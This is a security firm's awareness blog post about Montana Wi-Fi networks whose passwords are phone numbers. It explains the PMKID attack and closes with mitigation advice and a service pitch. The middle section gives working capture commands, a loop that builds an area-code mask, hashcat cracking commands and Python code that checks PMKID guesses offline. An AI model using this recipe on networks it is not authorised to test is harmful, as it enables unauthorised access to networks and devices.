Adversis estimates that 10% of networks in the region are using a password with a 406 area code and phone number, along with an aging Wi-Fi communication protocol. Is your Wi-Fi password your phone number?
It's no secret that many Wi-Fi access points in the northwest Montana region have their network name (SSID) configured as the account holder’s business name or last name and its password set to their 10-digit phone number. Just ask your neighbor.
This may sound acceptable since there are theoretically 10 billion combinations of phone numbers. But consider that Montana has only one area code for the entire state. And there are fewer than 300 area codes in use in the US.
This reduces the possible guesses from 10^10 (10 billion) to 10^7 (10 million) - that’s a thousand times fewer guesses. And computers can guess very quickly.
Also, consider those free Yellow Pages websites that often disclose your full phone number for free. That Wi-Fi password isn't so secret after all.
So What? What's the Risk?
Why do we have passwords on our Wi-Fi in the first place?
We lock our doors at the office and home. A strong Wi-Fi password restricts access to your computers and devices on your business and home networks to (hopefully) trusted people.
A strong password also stops untrusted people from using your IP address to reach the dark web, inappropriate content, or torrents, activity that the FBI and record labels may come to your door about. Imagine your son's friend borrows your car without permission and causes mayhem, which is caught on camera, and authorities visit you (this did not happen to me).
If you have data caps, your bandwidth can be used up by people free-loading from your connection. Imagine you buy pizza for your family, and the delivery driver eats it before you do (I hate it when this happens).
And What Happens If They Do Connect?
Most devices on your network, both home and business, are very rarely protected or hardened from other devices that can talk to them from the local network.
Many non-enterprise businesses have challenges in understanding where to focus their IT resources, what assets they have, and whether their controls are in place or effective.
This means a malicious person sitting in the parking lot or on the street can connect to your Wi-Fi network and talk to the computers and devices inside the building or your house.
Once connected, they start probing devices for vulnerabilities and weak passwords. Once they guess a password or find an exploitable vulnerability, they can log in to a computer or server and obtain its secrets: data, passwords, and other credentials for email and important websites, furthering their attacks.
These malicious hackers are typically interested in monetizing this access. They primarily do this through ransomware, which locks the computer and scrambles the data until you pay to get it back. Or they first steal the data, then blackmail you to pay, threatening to publish your business data on the dark web.
Another primary way hackers monetize access is to watch your business email until they see an opportunity to redirect a payment and steal the money. These Business Email Compromise attacks cost mid-sized businesses, on average, between $40,000 and $80,000. The cost rises sharply with the size of the business, and for organizations regulated under HIPAA, PCI, or GLBA (FTC Safeguards Rule).
How do we guess the password to hundreds of networks?
Feel free to skip this technical information and go to the end for how to keep yourself secure.
It's a crime to connect to computer resources without authorization. Only authorized networks were tested during this research.
When you browse a website, your browser makes a request to the web server, and the server responds with information to be displayed on your computer. In a similar way, when your Wi-Fi access point sends out signals to nearby devices, those devices can request information to connect to it. Part of the information the Wi-Fi access point sends back to the device is a code based on the Wi-Fi password. This code can be read by the device asking for it and is used to guess the password.
When your device moves between access points on the same network using the 802.11r protocol, your device identifier, or primary key identifier (PMKID), can be saved or cached in the access point so that as the device moves away and then comes back, it can authenticate faster.
Before this attack was identified, a hacker needed to wait for people or devices to connect to the network, wait for certain communication, and generally have certain stars align just right. Now, the information needed to guess passwords can be quickly obtained from information derived from the access point.
PrimaryKey(PMK) = PBKDF2(<Pre-shared key>, <SSID Name>, 4096)
PrimaryKeyID(PMKID) = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
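The two formulas above carried through in Python, as an added example that is not part of the original post. The SSID, both MAC addresses and the phone-number-style passphrase are constructed values; the point is that every input except the passphrase is public, so the PMKID is checkable offline.

```python
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """First formula: PMK = PBKDF2-HMAC-SHA1(pre-shared key, SSID, 4096 rounds),
    yielding the 32-byte master key used by WPA2-Personal."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """Second formula: PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA),
    i.e. the first 16 bytes (128 bits) of the HMAC-SHA1 tag."""
    msg = (b"PMK Name"
           + bytes.fromhex(mac_ap.replace(":", ""))
           + bytes.fromhex(mac_sta.replace(":", "")))
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]

def pmkid_matches(candidate: str, ssid: str, mac_ap: str, mac_sta: str,
                  observed_pmkid: bytes) -> bool:
    """The offline check hashcat mode 22000 performs: the SSID, both MACs and
    the PMKID itself travel in the clear, so a guess is confirmed or rejected
    without any further radio traffic."""
    guess = pmkid(pmk_from_passphrase(candidate, ssid), mac_ap, mac_sta)
    return hmac.compare_digest(guess, observed_pmkid)

# Constructed values, not captured from a real network.
SSID = "Example-Shop"
MAC_AP = "02:00:00:aa:bb:cc"       # access point (BSSID)
MAC_STA = "02:00:00:11:22:33"      # the client asking to connect
PHONE_STYLE_PSK = "4065550123"     # the weak pattern the post describes

# What an access point configured with that passphrase would send in the
# first message of the 4-way handshake.
OBSERVED_PMKID = pmkid(pmk_from_passphrase(PHONE_STYLE_PSK, SSID), MAC_AP, MAC_STA)

if __name__ == "__main__":
    print("PMKID:", OBSERVED_PMKID.hex())
    print("right passphrase confirmed:",
          pmkid_matches(PHONE_STYLE_PSK, SSID, MAC_AP, MAC_STA, OBSERVED_PMKID))
    print("off-by-one guess rejected:",
          not pmkid_matches("4065550124", SSID, MAC_AP, MAC_STA, OBSERVED_PMKID))
```

The PBKDF2 step is the only expensive part, and 4096 rounds of SHA-1 is cheap on modern hardware, which is why a 10^7 search finishes in minutes.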
And the steps to do this are quite simple, as open-source software takes care of the hard work. If you’re playing along at home with a Wi-Fi network you’re authorized to test, it’s as simple as running a few commands. We won't go into detail on setting up your environment here.
# listen to Wi-Fi traffic
sudo hcxdumptool -i wlan0 -w capture.pcap --disable_deauthentication
# convert the capture to the hash format hashcat expects
hcxpcapngtool -o capture.hash capture.pcap
# view ssid and hash information
hcxhashtool --info=stdout -i capture.hash
As we mentioned, there are fewer than 300 area codes in the US. Hashcat has a built-in way to iterate through every area code and every combination of digits after it, using "masks" and hybrid wordlist-plus-mask attacks. For the mask attack, we create a file with one line per area code, each followed by seven ?d digit placeholders.
# given a list of area codes, one per line
for e in $(cat areacodelist.txt); do echo "$e?d?d?d?d?d?d?d"; done | tee areacode.hcmask
And then execute our password-guessing attack as follows.
# mask attack: the hash file followed by the .hcmask file (no wordlist for -a 3)
.\hashcat.exe -a 3 -m 22000 .\capture.hash .\areacode.hcmask
# alternatively, a hybrid wordlist + mask attack: area codes from the list, then seven digits
.\hashcat.exe -a 6 -m 22000 .\capture.hash .\areacodelist.txt ?d?d?d?d?d?d?d -o cracked.txt
And after a few minutes on standard workstation hardware, pre-shared Wi-Fi keys are cracked.
How to Keep Your Wi-Fi Secure
To mitigate the risk of these Wi-Fi attacks, you have a few options. Note that you're not vulnerable to this specific attack if 802.11r roaming and WPA2-Personal mode are not enabled. But this advice still applies.
Upgrade Your Wi-Fi Security Protocol
- Enable WPA3 security, which is the latest Wi-Fi security protocol and prevents the attack outlined above. For specific instructions for your Wi-Fi access point device, see the following links. Your IT provider can typically help.
Use a Better Password
- Ask your internet service provider or IT provider to make the changes if you’re not managing any aspect of your network. Specifically:
- Change your network name (SSID) to be more generic - that is, not your last name
- Set the password to a long or random phrase
- Use long and complex passphrases. Hackers can easily guess thousands of passwords a second, so don’t choose a dictionary word and a number. Choose a memorable sentence or several words separated by a special character, for example.
- You can also use https://haveibeenpwned.com/Passwords to see if the password you’re choosing is in a hacked password list.
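A small checker for the password advice above, added here as an example that is not part of the original post. The area-code subset, the assumed 100,000-word dictionary size, the regular expressions and the sample passphrases are all constructed for the example; the 8-to-63-character limit is WPA2-Personal's own.

```python
import re

# Constructed subset of North American area codes for this check (the post
# notes fewer than 300 are in use nationally; 406 covers all of Montana).
AREA_CODES = {"406", "208", "307", "509", "605", "701"}

# Assumed size of the word list an attacker would pair with trailing digits.
DICTIONARY_WORDS = 100_000

# 10 digits in the common phone-number layouts: 4065550123, 406-555-0123, (406) 555-0123
PHONE_SHAPE = re.compile(r"\(?\d{3}\)?[-. ]?\d{3}[-. ]?\d{4}")

def weak_psk_reason(psk: str, area_codes=AREA_CODES):
    """Return (reason, estimated_guesses) when the pre-shared key has one of
    the shapes the post warns about, or (None, None) otherwise.  WPA2-Personal
    requires 8 to 63 characters, so anything else is rejected outright."""
    if not 8 <= len(psk) <= 63:
        return "invalid length for a WPA2-Personal passphrase", 0
    digits = re.sub(r"\D", "", psk)
    if PHONE_SHAPE.fullmatch(psk) and digits[:3] in area_codes:
        # one known area code plus seven free digits: 10**7 guesses per area code
        return "looks like a phone number with a known area code", len(area_codes) * 10**7
    if psk.isdigit():
        return "digits only", 10 ** len(psk)
    m = re.fullmatch(r"[A-Za-z]+(\d{1,4})", psk)
    if m:
        return "dictionary word followed by digits", DICTIONARY_WORDS * 10 ** len(m.group(1))
    return None, None

def passphrase_ok(psk: str, min_words: int = 4) -> bool:
    """Accept passphrases built the way the post recommends: several words
    separated by spaces or a special character, and none of the weak shapes."""
    reason, _ = weak_psk_reason(psk)
    if reason is not None:
        return False
    words = [w for w in re.split(r"[^A-Za-z0-9]+", psk) if w]
    return len(words) >= min_words

if __name__ == "__main__":
    for candidate in ["4065550123", "406-555-0123", "summer2023",
                      "bright-elk-crosses-frozen-river"]:
        print(f"{candidate!r:36} weak={weak_psk_reason(candidate)} ok={passphrase_ok(candidate)}")
```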
Use Separate Guest and Employee Networks
Use separate guest and work Wi-Fi networks to keep your business devices apart from unauthorized devices. If a compromised host connects to the network your work computers are on, they are at risk too. Your work network should use either a long, complex passphrase to prevent guessing or enterprise Wi-Fi authentication.
Keep Your Devices Up to Date
Keep Wi-Fi devices and software up to date. Depending on your provider, this may be done automatically. But if you haven’t bought a new router or Wi-Fi access point recently, you might need to update it manually.
Adversis can help identify your exposure and risk to this issue, helping you protect your assets, operations, and information. Ready to make a change in how you approach cybersecurity and business risk? Let’s connect.
Get in touch today!
Contact: [email protected]
Adversis ACS: https://acs.adversis.io